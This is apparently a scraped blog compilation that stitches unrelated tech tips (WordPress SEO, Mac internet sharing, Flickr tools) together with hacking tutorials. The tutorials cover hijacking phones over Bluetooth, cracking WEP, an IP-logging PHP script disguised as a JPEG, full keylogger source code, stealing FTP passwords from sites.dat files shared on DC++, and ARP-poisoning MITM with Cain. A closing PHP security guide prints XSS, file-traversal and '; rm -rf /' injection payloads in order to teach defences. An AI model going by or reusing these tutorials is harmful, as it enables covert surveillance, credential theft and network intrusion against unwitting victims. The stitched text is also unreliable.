We will here give you the best tips for making your WordPress SEO friendly.

Your best option is creating a Custom permalinks. For this tweak you simply change the page title that is given by default, which is of format: www.yourdomaincom/?p=5 , to a much more user friendly and search engine oriented title:www.yourdomainname.com/category/page title.

In order to do this you need to go to Options > Permalinks and change the default code for this other code – /%category%/%postname%/

Another tweak you can use is making your titles links. Links are easier to detect by search engines, and by this, easier to be found by your users.  Luckily, you can very easily convert your titles to links permanently. To do this, go to your Main Index Template and Page Template and find the post title’s code, which will be something like

[h2][?php the_title(); ?][/h2]

but between these > < instead of square brackets.

To transform your headings into links, replace this code by these next one, always changing the square brackets with > <

[h2][a href="[?php the_permalink() ?]” rel=”bookmark” title=”Permanent Link to [?php the_title(); ?]“][?php the_title(); ?][/a][/h2]

You are already ahead of the rest with your new SEO improvements, but there’s more. There are plenty of Google Sitemap generator plugins for WordPress. We’ll talk about the Google Sitemap generator plugin by Dagon Design specifically. You can use this very customizable (it´s options page is in the Word Press admin panel) plugin to create a sitemap for your WordPress powered site. You will be amazed by all the options it includes. From support for multi-level categories and pages to multiple-page generation with navigation; covering permalink support and letting you choose what you will display, the order of the items, and tons of other features worth checking.
The last tweak we’ll talk about is adding custom Meta tags to different pages on your WordPress blog. Using the All in one SEO plugin you can go further than settling with a general tag for your entire site. Having several meta tags throughout the different pages on your blog will make each page’s description unique when your site appears on the SERPS, meaning more options for people to click on!
With these WordPress tweaks you will be ahead of those who don´t have SEO WordPress blogs and will get lots of new visitors for sure!

Read more about WordPress tweaks!

The following is an excellent video tutorial regarding how one can use Bluetooth to hack a cellular phone by using Super Bluetooth hacking software.  Super Bluetooth Hack will make it extremely easy to hack cellular phones thru Bluetooth and turn into a Bluetooth spy. It is so simple to do.

Video Description

The video instruction is how to hack a Sony Ericsson and a Nokia cellular phone through Bluetooth using the Super Bluetooth Hack.

Download the computer program titled “Super Bluetooth Hack” (a.k.a. “BT Info“) @ http://uploading.com/files/7CSW1TEE/SuperBluetoothHack_v108.zip.html

When you use the Super Bluetooth Hack, you will be able to do the following things on the “hacked” cellular phone:

1.  Read and open SMS
2.  Open their phone book
3.  Change a profile
4.  Play their ringtones even when the “hacked” cellular phone is on “silent”
5.  Play mp3′s

6.  Turn off the cellular phone or even restart the phone
7.  Restore the phone to the original factory settings
8.  Change the volume of the ringer
9.  Make and receive calls from the “hacked” phone (you can even place the call on hold and make another call)

What to do

1.) Use “0000″ as the code when the cellular phones are connecting.
2.) The Bluetooth should be turned on for both phones before you begin running the BT file application.  If you don’t remember to turn it on, close out the application and run it again.
3.) Download the data file.
5.) Send and extract the Super Bluetooth Hack version 108.jar to your own cellular phone to open the file.

What to do for a Sony Ericsson cellular phone using a standard USB cable:
1. Connect the cellular phone to the computer.
2. It will mount as a disk.
3. Move the file that you’ve downloaded (Super Bluetooth Hack version 108.jar) to the following file: /MSSEMC/Media files/other/ on that disk (your phone).
4. Unplug the USB line from the cellular phone.
5. Go to the “Other” folder on the phone.
6. You will see a new application.  Install it by clicking the “Install” button.
7. The computer program is established on the place where you specify.  Typically, the file will be in the Application’s folder.

Switch the language to English:
If by chance that the software starts with “Slovencina” as the language, you now can switch it to English this way:
1. if you begin the application program for the very first time, you will see the word “Nastavenia.”
2. Scroll down until the word, “Jazyk” is displayed.
3. Click the choose button.
4. Choose the “English” for your preference.
5. Click on “More”.
6. Lastly, click the Spat” button.
7. The program is now in English.

I hope you enjoy Bluetooth hacking using the Super Bluetooth file application.  As a precaution, never unnecessarily keep your Bluetooth turned on. 

SpoonWep in BackTrack III

With the aforementioned BackTrack III live compact disc or VMware image that I employed late last week, I got around virtually all of the commands you will pick up there and utilize SpoonWep as an alternative.  When you have rebooted into BackTrack III, from the KDE computer menu, select BackTrack—Radio Network Analysis—80211—Cracking—SpoonWep.  All that you’ll require to execute SpoonWep versus a Wi-Fi network is the BSSID and Channel SSID.

Access the BSSID in the “Victim Mac” area of SpoonWep.   Select your wireless fidelity adapter from the drop down menu list, adjust the channel, and then launch the attack.  Decrease or increase the injection range utilizing the slider.

Regarding the BackTrack IV pre-release, several commenters call attention that it tolerates many wireless cards and may crack passwords quicker than using aircrack ptw.  BT4 systematically freezes on me; however, I think it was the edition of the Alfa USB transcriber I was utilizing that induced the problem.

KisMAC for the Mac OS X

Whenever you would like to acquire your crack on the Mac, download the complimentary KisMAC.  KisMAC can’t crack WEP on your standard built in Airport card; you will all the same, require a card that operates with a KisMAC device driver that supports bundle injection.  If you are utilizing an Alfa 500mw like I currently use, you will be able to utilize the standard USB RTL8187L driver.  From KisMAC’s Preferences drop down menu, add the device driver that works with the wireless adapter.  Scan for all of the networks and decide on the network you would like to crack.  Once you decide on the network, go to the Network drop down menu and choose “de-authenticate”.  As soon as the “Unique IVs” number is sufficient, choose Crack from the Network menu, and pick your attack.

Windows OS:  Aircrack-ng suite

From my vast experience, there is no non-command line software that you can set up on Windows to crack wireless encryption Protocol (WEP).  There are several tutorials on how to install the aircrack-ng suite for Windows and successfully running it.  I have tried a couple of them, but I quickly went back to BackTrack III.

Finally, You Recognize How to Safely Secure Your Wireless Network

Acknowledging how to crack wireless encryption protocol keys does not imply you go out and breach people’s wireless fidelity electronic networks.  It means that you have witnessed firsthand, precisely how “crackable” wireless encryption protocol keys are.  I have “acknowledged” for a long time now that the WPA is better than wireless encryption protocol, but the bridge on my electronic network offers WPA, but could not authenticate with it on my router.  It was not until I published my article last week where I acquired an updated working router.  That is the ability of examining something in action, where you have generally got to wade through blackhat internet sites.

This is an awkward matter, naturally, but thanks to every last one of you, the feedback thread from last week’s article enlightened a few of the finer points when it comes to wireless security.  To quickly recap:  Wireless encryption protocol does not in reality keep anybody away.  I appreciate MaribelAlligator’s equivalence of a wireless encryption protocol key to a home bedroom lock, the lock you can simply open by using a butter knife.  Everybody acknowledges how to unlock it, but when it is fastened, everybody that passes by realizes that they should stay out.  Glenn Fleishman equates WEP to a “Do Not Enter” sign.  A clear cut indicator that the people on the inside do not want you in, but nothing in reality will keep you out.

WPA is also “crackable”, but it is harder.  A wired electronic network is better secured than a wireless fidelity electronic network, as it is harder to link up to it.  If wiring your house is not an alternative, choose the WPA2 whenever possible.  As a lot of commenters remarked, WPA has been cracked in a few conditions as well, but it is not doe as easy as WEP.  To explain, MaribelAlligator continues with the “bedroom lock” analogy:

WPA is similar to your standard home door lock; it is a bit more secure, however, it’s all the same, easy to get in for someone with the knowledge, circumstances, and right tools.  WPA2 is equivalent to a safe at the bank.  It perhaps is conceivable to overcome, depending on how it is set up, although it is not realistically conceivable for anyone to actually do it, yet.

Filtering out MAC addresses and concealing SSID’s does not matter to those who would like to get in. A couple of commenters have stated that they have ceased transmitting their router’s SSID, and set up their MAC address filtering system that exclusively admits particular devices to associate to it. This criteria will bar those who do not recognize what they are doing, but not to those who do.

Not airing your SSID is similar to removing the address numbers off of a house.  The house is still there, and everybody can see it.  It is just a little harder to discover for those that do not know what they’re searching for already. Filtrating by MAC address is similar to having a bouncer at the main door that inspects everyone’s credentials against a list if they are allowed to enter. The sole problem is that the bouncer does not remember what people look like or call for identification, so anyone that can, will eavesdrop to hear what names are allowed in, and then admit to being the person on the bouncer’s list.

In conclusion, protect your material using several layers of protection. Whether your electronic network is wireless or wired, WPA, WPA2, or open, acquire a lot of measures to thoroughly secure your crucial stuff. Password your electronic network, perform malware and virus sweeps, run firewalls, and back up your data.  Do not swear totally on your wireless router’s password

If you have older devices that exclusively support WEP, you have to balance risk over reward. If your Play Station II only understands WEP, and you need wireless access, use the WEP while understanding what the dangers are located.

The operation postulates scanning a few temporary files (folders), searching for information typically contributed by operating system and other typical application operations. Firefox 3.5 searches for additional files and deeper subfolders for accumulated randomness, but it’s led to unforeseen events for users with excessively temporary files or folders that result in slower startup times.

Try builds are all the same being yielded with surefire fixes to this unfortunate bug, but several users describe a detectable improvement after erasing their Internet Temp files generated the IE and their temporary folders.

To clean out the temporary folders, check the following files and delete.  Please follow the example below:

C:\Documents and Settings\*user*\Local Settings\History
C:\Documents and Settings\*user*\Local Settings\Temporary Internet Files
C:\Documents And Settings\*user*\Local Settings\Temp
C:\Documents And Settings\*user*\Recent

On Windows Vista /7:

%USERPROFILE%\AppData\Local\Microsoft\Windows\History
%USERPROFILE%\AppData\Local\Microsoft\Windows\Temporary Internet Files
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent
%TEMP%

To erase Internet Temp Folders, go to the Control Panel and open up the Internet Options section. In your Browsing History area, click the Delete button and check off the options and click Delete.

A few users have reported a substantial betterment after performing these small steps, even for those of you who use IE occasionally.

A fix for the problem will be available with the patch Firefox 3.5.1, which is expected to be released in the next couple of weeks.

Here are some signs you need to look out for unauthorized activity on your email account:

- Emails are forwarded to a unknown email address (check your email account settings->forwarding).

- The secondary email id has changed to unknown email id.

- New emails are marked READ even before you read it.

- New filters set up in your email account.

If you are facing any of the above-mentioned activities then, it clearly indicates that your email id has been hacked.

Securing your Gmail id:

Gmail has additional features like IP address logging to secure your email. So, if your account is hacked then the IP address is recorded and the next time you login, you’ll be able to see the IP address.

The above image shows the IP address of the last login. You can view the IP address of last 5 activities by clicking on Details. If the last 5 activities has any IP that doesn’t belong to you then you need to secure the email id immediately to stop further unauthorized activities.

The steps to follow:
- Change your password (make it 8 or more alpha-numeric characters)
- Change your security question and answer.
- Change your Secondary email id.
- Remove any unknown filters.
- Disable POP3 and IMAP access to your email id.

This would make sure that you don’t get hacked further.

The initial step is to get familiar with the Internet Sharing application provided by Mac. As described above, navigate to Internet Sharing(option listed on the left).  Once you are on the Option page of Internet Sharing, you need to know what you exactly want to do before you proceed to turning it on. As you can see at this point, you need to pick where you want the shared connection to originate and where you are going to get the output. If you are planning to convert your Mac into a wireless internet hub, you would select

Share your connection from: Ethernet

To computer using: Airport

You can play around with any of the configurations here, like changing it from Bluetooth to Airport, Ethernet to Ethernet, etc. To enable this service, you need to check the internet sharing options checkbox in the left. Doing so, you can turn your Mac into a wireless internet hub. This works great when you are roaming and you just find a Ethernet plug but you’ve couple of laptops to connect. You can at this point create an internet hub for everyone to connect to.

One of the recently found feature that I like is using the Airport connection of my Macbook with my XBOX using an Ethernet connection. I’ve been doing this for a couple of times now, and this has saved me S$ 130 if I had to get myself a wireless adapter for my XBOX 360. Here is a step by step tutorial on sharing your internet connection using your Mac to get XBOX 360 online:

1. Enable internet sharing as shown above, in System Preferences of your Mac.  Select the sharing from Airport to Ethernet option.

2. Using an Ethernet cable connect your Macbook to your 360.

3. Goto Applications > Utilities, and open Terminal application on your Mac.

4. Type “ifconfig eno” in the terminal.

5. Look for a line that shows “inet XXX.XXX.XXX.XXX” in the screen of the terminal. Make a note of this number. In my case it was 210.172.51.1

6. Get the IP Address of your wireless internet router from System Preferences -> Network -> Select Airport -> Advanced -> TCP/IP Tab -> Router.  Note this number also. In my case it was 168.23.1.1

7. Go to the menu of the Network Settings once you start your XBOX 360. Now, you would have to fill in some numbers.

8. Enter the inet number you noted from your terminal screen against the IP Address, but note that you need to add 1 to the last digit. For instance, mine would be 210.172.51.2

9. Enter 255.255.255.0 against Subnet.

10. Enter the inet number against Router/Gateway.  Mine was 210.172.51.1

11. Enter the IP of your router against DNS (both primary and secondary).  Mine was 168.23.1.1

12. Leave PPPoE and advanced settings blank (default was off and automatic).

13. Test the connection and enjoy having a shared wireless internet connection to your Xbox 360 from your Apple Macbook.

If you need any assistance with configuration, please leave a comment to this and I’ll get back to you.

The basic idea is clever since it allows one-handed operation for low angles like skateboarding or many two-handed tricks like swoops, quick pivots, dutch angles, “steadycam” follow shots, upside-down transitions, and whatever crazy stuff you can imagine.
You can attach lights, a mic, zoom/focus controller (vital!), and other things.

He used an old steering wheel, a piece of aluminum plate and a wooden dowel. It isn’t that pretty to look at, but it definitely didn’t cost him $300 and it works pretty well too. Notice how this one has the full handle under the plate like the original FigRig prototype. It allows for stability and extra control of the rig. Now, you don’t always have to put you hands on the sides.

DIY FigRig

Both books provide many interesting projects including carpentry, fitting, machinery, planes, gliders, steam engines and a lot more with neat explaination and diagrams/sketchs to help you. They introduce you to a lot of hacks and mods in day to day life. Though the books were published in the 1910s and 1920s, it still makes for an interesting read. And mods will be mods, thats something that the book will make you realize.

The site offers you PDF, text as well as DOC format. Two of the best books you can download for free, for your holiday projects.

Things to Make

The Boy Mechanic

• Flickrfs Virtual Flickr Filesystem – Create a virtual userspace filesystem which allows easy uploading/downloading/searching of images through flickr.
• Projects on the construction of identity and flickr – a series of three projects investigating what constitutes the self. egoshotr, fixr and mixrrr
• WordPress Flickr Post Bar plugin – easily insert your Flickr photos into your blog posts.
• Phlickr – is an open source PHP5 based api kit used to access the Flickr API.
• Flickr AutoDownloadr – view Flickr photos in a fullscreen slideshow (Windows). Handy for showing off photos to a group of friends with a laptop and TV.
• Flickratr – vote from 1-10 for different flickr images.
• Flickr Soduku – play soduku with flickr images.
• KFlickr – A standalone Flickr.com uploader for KDE

And while you are at it, check out gtalkr, flickrball and wickr

The Great Flickr Tools Collection

[Click to see a bigger version]

When that happens we hate to wait for infinitely long times. So, I discovered a simple hack through which you can eliminate that screen.

Notice that the address bar contains the URL of the format http://mail.google.com/mail?auth=DQAA etc.

Now, all you have to do is, change the “http://” in your browser’s address bar to “https://”, which means the URL will now look like https://mail.google.com/mail?auth=DQAA etc. Press Enter. Gmail loads faster.

Just create a directory, put this php code into a file which is saved as a .jpg file. You need a real image, in my case called sig.jpg in the same directory, and a file called (in my case) siginfo22.txt – this must be chmod’d to 777. Obviously, file names etc can be different, but must also be changed in code below. Oh, and create a .htaccess, as shown at top of that code.

———-
The Script
———-
<?php /*
create a .htaccess file containing the following two lines:

Options All -Indexes
ForceType application/x-httpd-php

the first one means if someone tries to view directory, they are not
shown it, the second allows the script to work

*/
header(“Content-type: image/jpeg”);
$ip = getenv(“REMOTE_ADDR”);
$date = date(“d”) . ” ” . date(“F”) .
” ” . date(“Y”);
$ref = getenv(‘HTTP_REFERER’);
$ua = $_SERVER['HTTP_USER_AGENT'];
$intofile = $ip . ” || ” . $date . ” || ” . $ref
. ” || ” . $ua . “<br />”;
$hfile = fopen(“siginfo22.txt”, “a”);
fwrite($hfile, $intofile);
fclose($hfile);
$BGImage = imagecreatefromjpeg(“sig.jpg”);
imagejpeg($BGImage);
imagedestroy($BGImage);
?>

http://instruct1.cit.cornell.edu/courses/ee476/FinalProjects/

During the last 5 weeks of the semester in ECE476, Microcontroller Design, students have to combine sensors, actuators, microcontrollers, and mathematical techniques to build something.

Some projects are infrsstructure, such as an 8-bit color display for video games or a voice recognition scheme. Many groups built some kind of robot or musical device. All projects show a great deal of originality and work. There are over 200 projects on the page.

The image you see above is not photoshoped. Follow this link to verify. Using the special characters, number of such words can be formed.

The URL looks something like:

http://www.google.com/search?hl=en&lr=&safe=off&q=%E2%96%84%E2%96%84%E2%96%88%E2%96%80%E2%96%80+%E2%96%88%E2%96%AC%E2%96%88+%E2%96%88+%E2%96%80%E2%96%88%E2%96%80&btnG=Search

A close look at the searh term, you will notice terms like “%E2%96%84″

The last number of the three component term, decides the position of the blocks.

%E2%96%84- bottom horizontal dash

%E2%96%88 – straight line

%E2%96%80 – upper horizontal bar

%E2%96%AC – middle bar

%E2%96%BC – Down arrow

Many other such symbols are possible. You can always do the trial and error to find them. But with the above 5 codes, you can symbolize: H, I, J, L, M, S, T, U, W and Z.

A combination of %E2%96%84,%E2%96%84,%E2%96%88,%E2%96%80,%E2%96%80 will give you the letter S. To separate letters, use the ‘+’ operator in the search term feild.

Where can you use this. As of now, this doesn’t make sense. But this can also be made use of to label your google videos/photos etc. This will help capture attention

Demo

1. Global hook

Hook: A hook is a point in the system message-handling mechanism where an application can install a subroutine to monitor the message traffic in the system and process certain types of messages before they reach the target window procedure.

Available hooks:

WH_CALLWNDPROC
WH_CALLWNDPROCRET
WH_CBT
WH_DEBUG
WH_FOREGROUNDIDLE
WH_GETMESSAGE
WH_JOURNALPLAYBACK
WH_JOURNALRECORD
WH_KEYBOARD
WH_KEYBOARD_LL
WH_MOUSE
WH_MOUSE_LL
WH_MSGFILTER
WH_SHELL
WH_SYSMSGFILTER

To install a hook you call this API-function:

HHOOK SetWindowsHookEx(
int idHook, // type of hook to install
HOOKPROC lpfn, // address of hook procedure
HINSTANCE hMod, // handle to application instance
DWORD dwThreadId // identity of thread to install hook for
);

- idhook

Specifies the type of hook procedure to be installed. We choose “WH_KEYBOARD_LL” (13).

- lpfn

The LowLevelKeyboardProc hook procedure is an application-defined or library-defined callback function used with the SetWindowsHookEx function. The system calls this function every time a new keyboard input event is about to be posted into a thread input queue. The keyboard input can come from the local keyboard driver or from calls to thekeybd_event function. If the input comes from a call to keybd_event, the input was “injected”.

The HOOKPROC type defines a pointer to this callback function. LowLevelKeyboardProc is a placeholder for the application-defined or library-defined function name.

LRESULT CALLBACK LowLevelKeyboardProc(
int nCode, // hook code
WPARAM wParam, // message identifier
LPARAM lParam // pointer to structure with message data
);

- hMod

In this case, our instance handle.

- dwThreadId

Specifies the identifier of the thread with which the hook procedure is to be associated.
If this parameter is zero, the hook procedure is associated with all existing threads.

Now we know enough to create our first keylogger, using a global keyboard hook:

————————————————————————————————————————–


#include <stdio.h>
#include <windows.h>
#define FILENAME "keylog.txt"

void CheckKey(int key);

LRESULT CALLBACK KeyboardHook(
int nCode, // hook code
WPARAM wParam, // message identifier
LPARAM lParam // pointer to structure with message data
);

typedef struct tagKBDLLHOOKSTRUCT {
DWORD vkCode; // virtual key code
DWORD scanCode; // scan code
DWORD flags; // flags
DWORD time; // time stamp for this message
DWORD dwExtraInfo; // extra info from the driver or keybd_event
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;

HHOOK hHook;

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow )
{
hHook = SetWindowsHookEx(13, KeyboardHook, hInstance , 0);
while (GetMessage(NULL,NULL,0,0)) ; // NOP while not WM_QUIT
return UnhookWindowsHookEx(hHook);
}

LRESULT CALLBACK KeyboardHook (int nCode, WPARAM wParam, LPARAM lParam )
{
if (nCode == HC_ACTION)
if (wParam == WM_SYSKEYDOWN || wParam == WM_KEYDOWN)
CheckKey (((PKBDLLHOOKSTRUCT)lParam)->vkCode);
return CallNextHookEx(hHook, nCode, wParam, lParam);
}

void CheckKey(int key)
{
FILE *pfile = fopen(FILENAME,"a+");
// translate virtual key code to ascii
// and write it to file..
fclose(pfile);
}

————————————————————————————————————————–

2.

GetAsyncKeyState()

The GetAsyncKeyState function determines whether a key is up or down at the time the function is called, and whether the key was pressed after a previous call to GetAsyncKeyState.

SHORT GetAsyncKeyState(
int vKey // virtual-key code
);

- vKey

Specifies one of 256 possible virtual-key codes.

This is our second keylogger, now using GetAsyncKeyState() :

————————————————————————————————————————–

#include <stdio.h>
#include <windows.h>

#define FILENAME "keylog.txt"

void CheckKey(int key);

void main()
{
while(1)
{
Sleep(10); // avoid 100% cpu usage

for(int key=8; key<=190; key++)
if (GetAsyncKeyState(key) == HC_ACTION)
CheckKey(key);
}
}

void CheckKey(int key)
{
// ...
}

==========================================================================================================================

The CheckKey() function may look like :


void CheckKey(int key)
{
FILE *pfile = fopen(FILENAME,"a+");

if (key==8)
fprintf(pfile,"%s","[del]");
if (key==13)
fprintf(pfile,"%s","\n");
if (key==32)
fprintf(pfile,"%s"," ");
if (key==VK_CAPITAL)
fprintf(pfile,"%s","[CAPS]");
if (key==VK_TAB)
fprintf(pfile,"%s","[TAB]");
if (key==VK_SHIFT)
fprintf(pfile,"%s","[SHIFT]");
if (key==VK_CONTROL)
fprintf(pfile,"%s","[CTRL]");
if (key==VK_PAUSE)
fprintf(pfile,"%s","[PAUSE]");
if (key==VK_ESCAPE)
fprintf(pfile,"%s","[ESC]");
if (key==VK_END)
fprintf(pfile,"%s","[END]");
if (key==VK_HOME)
fprintf(pfile,"%s","[HOME]");
if (key==VK_LEFT)
fprintf(pfile,"%s","[LEFT]");
if (key==VK_UP)
fprintf(pfile,"%s","[UP]");
if (key==VK_RIGHT)
fprintf(pfile,"%s","[RIGHT]");
if (key==VK_DOWN)
fprintf(pfile,"%s","[DOWN]");
if (key==VK_SNAPSHOT)
fprintf(pfile,"%s","[PRINT]");
if (key==VK_NUMLOCK)
fprintf(pfile,"%s","[NUM LOCK]");
if (key==190 || key==110)
fprintf(pfile,"%s",".");

if (key >=96 && key <= 105)
{
key -= 48;
fprintf(pfile,"%s",&key);
}

if (key >=48 && key <= 59)
fprintf(pfile,"%s",&key);

if (key !=VK_LBUTTON || key !=VK_RBUTTON)
{
if (key >=65 && key <=90)
{
if (GetKeyState(VK_CAPITAL))
fprintf(pfile,"%s",&key);
else
{
key = key +32;
fprintf(pfile,"%s",&key);

}
}
}

fclose(pfile);
}
The virtual key code table -> google. Compiled with MS VC++ 6.0.

bugs:
sure.. let me know.

Right when you’ve downloaded DC++ and made all the configurations then enter a good hub (one with alot of people). Now to the harvesting password part. To get hold of password you need to get some dat files. For example some ftp clients store their passwords in files. One of the most popular clients is Flash FXP, that client stores the password in the sites.dat file. So what you do is to search for the sites.dat file in DC++ and then make sure that you uncheck the option “Only find user with free slots” since the file you are going to download only take around 3 kb or something. Then you should be able to download it even if your target doesn’t have any free slots. Right after you’ve downloaded around 5 of them go to google and search for Flash FXP password decrypter. Then just open the sites.dat file with notepad and decrypt the passwords. Tada! You can now enter the ftp, unless they changed it of course.

Another way is to search for another clients password file. One called WS FTP32. Hmm… now when I think about it I don’t really remember butI think the
file was called wsftp.ini. You could use an online decrypter to decrypt those passwords… you could just google it or go to:

http://www.hispasec.com/directorio/laboratorio/Software/ws_ftp.html

That was it I suppose… oh and don’t do anything illegal! Like downloading warez or something. This tutorial is for educational purposes only, which explains its intended vagueness. =)

Disclaimer: This is for educational purposes only. This site is not liable if you mess up your operating system using this tutorial.

A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious people to compromise a user’s system.

The vulnerability is caused due to an unspecified error in the handling of animated cursors and can e.g. be exploited by tricking a user into visiting a malicious website using Internet Explorer or opening a malicious e-mail message.

Successful exploitation allows execution of arbitrary code.

So be careful where you go for awhile.

Quick Info: Affects IE users on windows xp, 2000, and vista.

Helpful Link: http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/luawinxp.mspx
http://secunia.com/advisories/24659/

1. This is not about “what is arp and mitm?” there are already enough articles about that in BotHack. This is merely how to do it using cain and able so before reading this article go and read some of the others so that your not just a script kiddy.

2. I’m gong to assume that you can’t run .exe files on what ever account you are using and therefore I will tell you how to get around this.

3. I do not take any responsibility for any of the information in this document or the uses it is put to.

Ok now that we have that sorted out…

What you will need:

• A laptop.
• Cain and able. Download it from, www.oxid.it/index.html
• A network to sniff.

Now onto how to do this:

1) Download and install cain and able.

2) Set your laptop up and steal an ethernet connection from a nearby computer on the network. Plug the Ethernet cable in. You are now connected. With no restrictions on what you can run.

3) Start cain and able.

4) Now click on the sniffer tab. Now notice the two symbols – the one that looks the same as the one on the sniffer tab and the one that looks like a nuclear sign.

5) Mouse over them and they will tell you that one starts the sniffer and the other starts arp poisoning.

6) Now click on configure -> click on the arp tab and make sure that you are using your real ip and mac address, if you don’t you wont get any hosts or be able to arp poision.
7) Now start the sniffer and press the blue plus sign. This will let you scan for hosts in your subnet.

8) Now go back to configure and select use a spoofed ip and mac address. Now type an ip from your sub net but the last bit must be numbers that are unused so the network doesn’t get confused.

9) Select all the hosts you find and right click and go resolve host name. Now try to find the router, it will usually stand out easily. The router probably wont have a name as well as being a different brand from everything else and have a really low or really high ip address so you should spot it easily.

10) Now click on the arp tab at the bottom of the sniffer window. Click on the top table part and click the blue plus sign again. This brings up a window that allows you to select the ip addresses that you want to arp poison the first one you select should be the router and in the second box select any computers you want to listen to.

11) Click ok. Click the start arp button. You are now listening between the router and as many computers as you selected.

12) Watch as the routed packets role in. Select the password tab at the bottom of the screen and watch the passwords appear.

13) Any password hashes can be sent to the cracker and broken form there but that isn’t going to be covered in this article. I am sure you can work that out or may be I shall post it later.

NOTE: I expect you to be a somewhat fluent PHP developer who has a general idea of what’s going on in computer/network security. If you don’t understand some part of the code, you should probably read up on some PHP tutorials, and also read some of the security guides on php.net and other locations on the Internet.

However, before I even get into the code part of this shin dig, one obvious fact should be stated that you should never give a public_html directory (or any other directory that you are using to host your files) nor any of its files ownership by any user with root privileges. This and any other techniques you can think of must be implemented in order to minimize the damage an attacker can do. That being said, on with coding!

Let’s look at a typical attack of a PHP program. The following code is an example of an unsecure script to ‘echo’ the visitor’s name:

<?php
if (isSet($_POST['name']))
{
echo "Hello, " . $_POST['name'];
}
else
{
echo '<form action="' . $PHPSELF . '" method="post"><br>';
echo 'Your name, please:  <input type="text" name="name"><br>';
echo '<input type="submit" value="Submit">';
echo "</form>";
}
?>

Now this may look fine if you were to input a name such as ‘John’ or ‘Marry’, but what if the attacker were to input something like:

<script language="JavaScript" type="text/javascript"> window.location.href="http://www.bad-side-to-go-to.com/"; </script>

This means that this script would allow the attacker to deface your page (among many other evil little deeds such as setting up a backdoor with a little skill). As a practice, you should never, ever output code that is directly inputted from the user. In this case, PHP has a few functions that would allow us to solve this problem.

First off, strip_tags() simply removes HTML and PHP tags from a string. For example:

<?php
$str = "<html>hi</html>";
echo strip_tags($str);
// outputs 'hi'
?>

This works for most cases, but there are also ways of outputting the HTML code without executing it. Two functions, htmlentities() and htmlspecialchars(), convert any sort of <, >, ” and & to their HTML entities (HTML entities output code instead of executing it, ex. a web site might give your browser “& gt;”, but the web browser outputs that as “>”). Here’s an example of using htmlentities():

<?php
$str = "<html>hi</html>";
echo htmlentities($str);
// outputs '<html>hi</html>'
?>

This way, you can see the actual code but it won’t be executed (as in you would see the JavaScript code I showed you above, but you won’t have the page redirect). I like to use htmlentities() because it converts ALL of HTML entities to their representitive codes, but htmlspecialchars() is fine for simply wanting to thwart off an attacker. (Note that htmlspecialchars() works exactly the same as htmlentities() does as far as usage is concerned.)

So, here’s an example of a fixed version of the script I showed you earlier:

<?php
if (isSet($_POST['name']))
{
echo "Hello, " . htmlspecialchars($_POST['name']);
}
else
{
echo '<form action="' . $PHPSELF . '" method="post"><br>';
echo 'Your name, please:  <input type="text" name="name"><br>';
echo '<input type="submit" value="Submit">';
echo "</form>";
}
?>

NOTE: About 90% or more of PHP-related exploits are from some kind of way of attacking the developer’s input ($_GET, $_POST…).

Outputted code is not the only kind of input attack we have to worry about. Another kind is that which involve the programmer reading arbitrary files. For example, let’s say we have a script like:

<?php
if (isSet($_GET['file']))
{
$theFile = fopen($_GET['file'], "r");
echo fread($theFile, filesize($_GET['file']));
fclose($theFile);
}
else
{
echo '<form action="' . $PHPSELF . '" method="get"><br>';
echo '<select name="file"><option value="testFile.html">testFile.html</select><br>';
echo '<input type="submit" value="Submit">';
echo "</form>";
}
?>

This may look all fine and dandy, but it’s flawed out the kazoo. First of all, since this form uses the ‘get’ method of handling input, the user can simply change the file from the URL line of the browser. Second, an attacker could simply create a HTML page on his/her own site with code like:

<form action="http://yoursitehere.com/scriptijustwrote.php" method="get">
<input type="text" name="file"> <input type="submit" value="Submit">
</form>

Either way, they can change the file you open to anything they like. For example, let’s say that they set $_GET['file'] to be something like ‘/etc/passwd’. They could have that easily obtained and possibly cracked into your account from the UNIX ‘passwd’ file! (Not to mention any other sensitive files they could’ve opened from this script…)

Clearly this script is very, very dangerous for you as a programmer. There are a few options you can do to prevent this:

First off, let’s say that you only have a list of available files that the script will open. Change the file opening code to first see if the file is one that you will let it open, such as:

if ($_GET['file'] == "testFile.html")
{
// open the file
}
else
{
// don't open the file
}

Or, even better would be something like:

switch ($_GET['file'])
{
case "testFile.html":
$file = "testFile.html";
break;
case "otherFile.html":
$file = "otherFile.html";
break;
}
// open the file using $file

Another option would be to remove any slashes or dots from the filename, but then again you would still allow the attacker to open any file in that single directory. If that directory is safe, then use str_replace() like so:

$file = str_replace("/", "", str_replace("\", "", str_replace(".", "", $_POST['file'])));

Now, only open the $file variable.

This option is definitely not recommended simply because that entire directory is vulnerable to be publicly accessible, but if you don’t mind then go ahead.

Now then, let’s have a look at another type of input attack in the form of running arbitrary programs. Let’s say you have a script that will use the system command ‘ping’ to see if a network target is alive. Here’s an example of this script as a vulnerability:

<?php
if (isSet($_POST['target']))
{
system("ping " . $_POST['target']);
}
else
{
echo '<form action="' . $PHPSELF . '" method="post"><br>';
echo '<input type="text" name="target" value="Target Address"><br>';
echo '<input type="submit" value="Submit"></form>';
}
?>

This would be fine if the user simply inputted a target, like “yahoo.com”. However, what if the attacker inputted a statement like “; rm -rf /”? Just like that, your entire filesystem got whipped clean from one vulnerable script (assuming your account has root privileges, but either way a lot of important stuff is getting deleted).

There are a few solutions here, chiefly to filter out any bad input using a function like preg_replace(), but even I had trouble learning how to use that function. A more simple, but not as secure, solution is to use escapeshellcmd(). This function returns a string from your command that prevents the user from running any other program than the one you want it to run (“ping” in this example). As an example, you’d simply do this:

system(escapeshellcmd("ping " . $_POST['target']));

While this prevents any other programs from being run, it does not prevent the attacker from inputting invalid data to ‘ping’. If there was an exploit for that program or some kind of input that would make it exit or run another program itself, then you’re still screwed. Your best bet is to try and stay away from allowing visitors to access any kind of system() commands.

Other than input attacks, there are plenty of code problems that you as a programmer may not even know about. One thing you should always remember, however, is to keep your code from being shown as much as possible. Let’s say an attacker somehow renames your file from index.php to index.phps. On most PHP web servers, this will show all the code in index.php (including the PHP code) so that the attacker can find a flaw they wouldn’t have found without seeing the code. A good bet to keep this from happening is to make your scripts executable only in a cgi-bin directory.

However, some web servers do not support scripts in a cgi-bin directory. If yours does, then simply try putting a test script in that directory and ‘chmod +x’ the file to make it executable. The code will change a little bit, because instead of PHP being inside of the HTML coded file, the HTML will be inside your PHP script! Here’s an example:

